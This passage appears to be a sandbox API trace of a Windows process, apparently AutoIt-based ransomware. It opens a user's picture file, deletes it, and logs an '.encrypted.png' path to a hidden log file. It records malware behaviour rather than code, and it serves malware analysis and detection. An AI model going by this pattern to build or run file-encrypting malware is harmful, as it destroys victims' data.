(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.339] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.339] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da318 [0039.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da318, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.340] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.340] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.340] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.340] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0039.340] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.340] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0039.340] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.340] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.342] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.342] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.342] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.342] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.342] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.342] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\afpzd.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0039.342] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.342] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.342] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.342] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.342] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.343] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.343] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.345] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.345] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.345] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.345] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.345] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.345] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.345] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.345] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.346] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.346] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.346] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.346] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.346] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png", lpFilePart=0x0) returned 0x30 [0039.346] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d72d00, ftCreationTime.dwHighDateTime=0x1d5b912, ftLastAccessTime.dwLowDateTime=0x9572e040, ftLastAccessTime.dwHighDateTime=0x1d5bcd4, ftLastWriteTime.dwLowDateTime=0x17285040, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="AfpZd.png", cAlternateFileName="")) returned 0x7c2240 [0039.346] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\afpzd.png")) returned 1 [0039.347] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d72d00, ftCreationTime.dwHighDateTime=0x1d5b912, ftLastAccessTime.dwLowDateTime=0x9572e040, ftLastAccessTime.dwHighDateTime=0x1d5bcd4, ftLastWriteTime.dwLowDateTime=0x17285040, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="AfpZd.png", cAlternateFileName="")) returned 0 [0039.347] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.348] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.349] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.349] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.349] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0039.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.350] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.350] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.350] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.350] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.350] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.350] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.350] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x28db, lpOverlapped=0x0) returned 1 [0039.350] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.351] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x28db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.351] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0039.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.encrypted.png\r\n", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 